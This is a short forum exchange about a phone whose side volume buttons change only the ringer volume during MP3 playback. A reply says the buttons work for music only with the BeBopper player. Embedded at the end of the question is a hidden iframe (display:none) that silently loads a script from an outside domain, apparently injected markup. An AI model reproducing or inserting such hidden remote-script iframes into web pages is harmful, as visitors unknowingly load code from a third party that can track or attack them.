I am pretty sure I saw in the documentation for the phone that the volume controls on the side of the phone are supposed to control the MP3 volume. It is not working. Pressing the volume buttons only set the ringer volume setting even while the MP3 is playing. I tried looking for settings that may be set wrong but could not find any. Am I correct that it should work? Is there a setting that I am unable to find.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I don't believe those buttons control the mp3 player unless you buy the BeBopper mp3 player.
